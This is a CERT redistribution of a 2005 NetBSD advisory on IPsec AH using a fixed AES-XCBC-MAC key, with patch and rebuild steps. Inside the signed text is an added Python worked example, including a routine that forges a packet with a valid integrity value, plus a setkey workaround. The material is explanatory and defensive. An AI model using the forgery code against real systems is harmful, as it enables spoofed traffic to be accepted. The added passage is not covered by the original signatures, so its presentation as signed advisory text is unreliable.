-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

            ESB-2005.0887 -- NetBSD Security Advisory 2005-007
            AES-XCBC-MAC (IPsec AH) calculated using fixed key
                              8 November 2005

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           IPsec with AH and AES-XCBC-MAC
Publisher:         NetBSD
Operating System:  NetBSD-current (source prior to July 28, 2005)
                   NetBSD 2.0.2
                   NetBSD 2.0
Impact:            Reduced Security
Access:            Remote/Unauthenticated

Original Bulletin: 
ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2005-007.txt.asc

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


		 NetBSD Security Advisory 2005-007
		 =================================

Topic:		AES-XCBC-MAC (IPsec AH) calculated using fixed key

Version:	NetBSD-current:	source prior to July 28, 2005
		NetBSD 2.1:	not affected
		NetBSD 2.0.3:	not affected
		NetBSD 2.0.2:	affected
		NetBSD 2.0:	affected
		NetBSD 1.6.*:	unaffected

Severity:	Affected SAs lack integrity protection so an attacker
		can forge data and have it be wrongly accepted

Fixed:		NetBSD-current:		July 28, 2005
		NetBSD-3 branch:	July 28, 2005
						(3.0 will include the fix)
		NetBSD-2.0 branch:	July 28, 2005 
						(2.0.3 includes the fix)
		NetBSD-2 branch:	July 28, 2005
						(2.1 includes the fix)


Abstract
========

Machines using IPsec [RFC2401] with AH and AES-XCBC-MAC algorithm
[RFC3566] incorrectly used a fixed key instead of the provided one.
Because a known key is used, affected Security Associations lack
integrity and data origin authentication protection, and an attacker
could send forged packets which would be accepted by the receiver.


Technical Details
=================

An error in the implementation of the AES-XCBC-MAC algorithm, used by
IPsec SAs for authentication: ah_aes_xcbc_mac_init() did not encrypt
r_k1s under the configured key, and only seeded it with the constant
in k1seed.

r_k1s was later passed as the encryption key to rijndaelEncrypt() by
ah_aes_xcbc_mac_loop() and ah_aes_xcbc_mac_result(), so every SA was
authenticated with the same fixed key, and the key set by the
administrator and passed from userland was never used.

Because of this error, a receiving system using AH with AES-XCBC-MAC
checks an IPsec datagram with a fixed and known key.  An attacker
could create a forged packet with a valid Integrity Check Value,
causing the receiver to accept the packet.  Also, systems with this
bug would not interoperate with systems that derive the key correctly.

If AH with AES-XCBC-MAC is used without confidentiality protection
(e.g. ESP [RFC2406]), an attacker can trivially cause data of his
choice to be received and processed.  With confidentiality protection,
causing particular data to be processed is harder, but note that in
general confidentiality mechanisms do not provide effective integrity
protection.
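
The key derivation described above, as an added worked example that is
not part of the NetBSD advisory nor of the KAME/NetBSD source: a
self-contained AES-128 and RFC 3566 AES-XCBC-MAC in Python, with a
buggy=True switch that leaves K1 as the k1seed constant the way
ah_aes_xcbc_mac_init() did, and an attacker routine showing why a fixed
K1 is fatal.  The advisory names only r_k1s, so the model assumes K2 and
K3 were still derived from the real key (the case most favourable to
the defender); even then, anyone who has captured one packet that the
affected receiver accepted can build a different packet carrying the
same ICV without ever learning K2.  Function names, the sample key and
the sample message are the example's own.

```python
# Added example, not NetBSD/KAME code: AES-128 (encryption only), AES-XCBC-MAC
# per RFC 3566, a switch reproducing the K1 error the advisory describes, and
# the forgery a known K1 permits.  Assumption: K2 and K3 are derived correctly.

def _xtime(b):
    """Multiply by x in GF(2^8) modulo the AES polynomial."""
    b <<= 1
    return (b ^ 0x11B) & 0xFF if b & 0x100 else b

def _build_sbox():
    """Generate the AES S-box: GF(2^8) inverse (via generator 3), then affine map."""
    sbox, p, q = [0] * 256, 1, 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF      # p *= 3
        q ^= q << 1; q ^= q << 2; q ^= q << 4; q &= 0xFF           # q /= 3
        if q & 0x80:
            q ^= 0x09
        x = q ^ (q << 1) ^ (q << 2) ^ (q << 3) ^ (q << 4)
        sbox[p] = (x ^ (x >> 8) ^ 0x63) & 0xFF
        if p == 1:
            break
    sbox[0] = 0x63
    return sbox

SBOX = _build_sbox()

def _round_keys(key):
    """AES-128 key schedule: eleven 16-byte round keys."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:                                             # RotWord, SubWord, Rcon
            t = [SBOX[t[1]] ^ rcon, SBOX[t[2]], SBOX[t[3]], SBOX[t[0]]]
            rcon = _xtime(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def aes128_encrypt(key, block):
    """Encrypt one 16-byte block under a 16-byte key (FIPS-197)."""
    rk = _round_keys(key)
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                   # SubBytes
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]         # ShiftRows
        if rnd < 10:                                               # MixColumns
            out = []
            for c in range(0, 16, 4):
                a0, a1, a2, a3 = s[c:c + 4]
                out += [_xtime(a0) ^ _xtime(a1) ^ a1 ^ a2 ^ a3,
                        a0 ^ _xtime(a1) ^ _xtime(a2) ^ a2 ^ a3,
                        a0 ^ a1 ^ _xtime(a2) ^ _xtime(a3) ^ a3,
                        _xtime(a0) ^ a0 ^ a1 ^ a2 ^ _xtime(a3)]
            s = out
        s = [b ^ k for b, k in zip(s, rk[rnd])]                    # AddRoundKey
    return bytes(s)

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def xcbc_subkeys(key, buggy=False):
    """RFC 3566: K1, K2, K3 = AES_K(0x01*16), AES_K(0x02*16), AES_K(0x03*16).
    buggy=True models the advisory's error: K1 stays the k1seed constant."""
    seeds = [bytes([i]) * 16 for i in (1, 2, 3)]
    k1, k2, k3 = (aes128_encrypt(key, s) for s in seeds)
    return (seeds[0] if buggy else k1), k2, k3

def aes_xcbc_mac(key, msg, buggy=False):
    """Full 128-bit AES-XCBC-MAC; AH carries the first 96 bits (AES-XCBC-MAC-96)."""
    k1, k2, k3 = xcbc_subkeys(key, buggy)
    blocks = [msg[i:i + 16] for i in range(0, len(msg), 16)] or [b""]
    e = bytes(16)
    for m in blocks[:-1]:                                          # CBC chain under K1
        e = aes128_encrypt(k1, _xor(e, m))
    last = blocks[-1]
    if len(last) == 16:                                            # whole block: mask K2
        final = _xor(_xor(e, last), k2)
    else:                                                          # pad 10*: mask K3
        final = _xor(_xor(e, last + b"\x80" + bytes(15 - len(last))), k3)
    return aes128_encrypt(k1, final)

def ah_icv_ok(key, msg, icv96, buggy=False):
    """Receiver-side check of the 96-bit ICV carried in the AH header."""
    return aes_xcbc_mac(key, msg, buggy)[:12] == icv96

def forge_with_known_k1(valid_msg, chosen_prefix):
    """Attacker side, knowing only that K1 = 0x01*16.  From one message the buggy
    receiver accepted (non-empty, whole blocks) and any whole-block prefix, build
    a different message with the same ICV: choose the last block so that
    E'[n-1] XOR M'[n] equals E[n-1] XOR M[n]; the K2 mask and the final AES call
    are then identical, so K2 never has to be known."""
    k1 = bytes([1]) * 16
    def chain(data):
        e = bytes(16)
        for i in range(0, len(data), 16):
            e = aes128_encrypt(k1, _xor(e, data[i:i + 16]))
        return e
    target = _xor(chain(valid_msg[:-16]), valid_msg[-16:])
    return chosen_prefix + _xor(chain(chosen_prefix), target)
```

With a key of 00..0f and a 32-byte message, ah_icv_ok(key, forged, icv,
buggy=True) is true for the forged message while ah_icv_ok(key, forged,
icv) is false, which is the fixed kernel rejecting it.  The values of
aes_xcbc_mac(key, msg) and aes_xcbc_mac(key, msg, buggy=True) also differ
for every key, which is the interoperability failure noted above: the
fixed side computes one ICV, the affected side another.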


Solutions and Workarounds
=========================

A workaround is to not use the AES-XCBC-MAC algorithm for authentication,
but it is highly recommended that any users of affected NetBSD versions
upgrade their kernel.
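
An added illustration of the workaround, not from the advisory: a
setkey(8) SAD entry for an AH SA that uses the affected algorithm,
beside the same SA re-keyed for hmac-sha1.  Addresses, SPI and keys are
placeholders; the key lengths are the ones setkey requires (128 bits for
aes-xcbc-mac, 160 bits for hmac-sha1), and both peers must be changed
together.

```text
# before: AH SA authenticated with the affected algorithm (placeholder addresses, SPI, key)
add 192.0.2.1 192.0.2.2 ah 0x200 -A aes-xcbc-mac 0x000102030405060708090a0b0c0d0e0f;

# workaround: same SA re-keyed with HMAC-SHA1 (160-bit key); apply on both peers
add 192.0.2.1 192.0.2.2 ah 0x200 -A hmac-sha1 0x000102030405060708090a0b0c0d0e0f10111213;
```

On an affected host, "setkey -D" dumps the SAD and shows each SA's
authentication algorithm on its "A:" line, so searching that output for
aes-xcbc-mac lists the SAs that need re-keying until the kernel has been
rebuilt.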

The following instructions describe how to upgrade your kernel by
updating your source tree and rebuilding and installing a new version of
the kernel.

* NetBSD-current:

	Systems running NetBSD-current dated from before 2005-07-28
	should be upgraded to NetBSD-current dated 2005-07-29 or later.
	(Systems built from the netbsd-3 branch should be upgraded to
	2005-07-29 or later.)

	The following files need to be updated from the
	netbsd-current CVS branch (aka HEAD):
		src/sys/netinet6/ah_aesxcbcmac.c

	To update from CVS, re-build, and re-install the kernel:
		# cd src
		# cvs update -d -P sys/netinet6/ah_aesxcbcmac.c
		# ./build.sh kernel=GENERIC
		# mv /netbsd /netbsd.old
		# cp sys/arch/`machine`/compile/obj/GENERIC/netbsd /netbsd
		# shutdown -r now


* NetBSD 2.x:

	Systems built from source along the netbsd-2 or netbsd-2-0 branches
	dated from before 2005-07-28 should be upgraded from sources dated
	2005-07-29 or later. This includes the binary distributions of
	NetBSD 2.0 and NetBSD 2.0.2.

	NetBSD 2.1 includes the fix.

	The following files should be updated from CVS:
		src/sys/netinet6/ah_aesxcbcmac.c

	To update from CVS, verify that your sources are from the correct
	branch, re-build, and re-install the kernel:

		# cd src
		# cvs update -d -P sys/netinet6/ah_aesxcbcmac.c
		# ./build.sh kernel=GENERIC
		# mv /netbsd /netbsd.old
		# cp sys/arch/`machine`/compile/obj/GENERIC/netbsd /netbsd
		# shutdown -r now


* NetBSD 1.6 (and subsequent point releases) do not include
  AES-XCBC-MAC and are thus unaffected.


Thanks To
=========

Yukiyo Akisada for reporting the bug to KAME.
SUZUKI Shinsuike for reporting the bug to NetBSD.
Christos Zoulas for quickly adapting the fix to NetBSD.


Revision History
================

	2005-10-31	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  
ftp://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2005-007.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/.


Copyright 2005, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2005-007.txt,v 1.8 2005/10/31 06:41:04 gendalia Exp $

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (NetBSD)

iQCVAwUBQ2fKdD5Ru2/4N2IFAQIEUQQAlpQMrJ1YeDOC4SggrVbxTgwr6HtZzSU6
Rl7F1fQybzN4tcUnYo3m20k57IKLr94SDOUI5rrL9O0qU8Oz/V7V8hI48Z82HXk9
gk2yFnWgeTYOOttSPXkEU7/ohDKibQXK6+1JTG3L3NTAAmphTBai0nxii0iNN9Vk
wdIxN4YcaqA=
=GnoS
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked in 
any way, we encourage you to let us know by completing the secure National IT 
Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBQ2/0gyh9+71yA2DNAQKduwP+O+6af9PVnQIFX89a1RtRdK1HYtdJUT8v
dAdY0YD15BPTDK5+foDiwStbbhPwL/LlwtJjqdvJ9NYb76jQk0Cq+zTfdJUgp5iQ
87SU9wdaxOnxmzm1HQS66sHYeIFbLN5iNm9nyjTW95Iu+6t4uW8wzZpRYrM9HDZq
UhuSJ009pcg=
=OPgw
-----END PGP SIGNATURE-----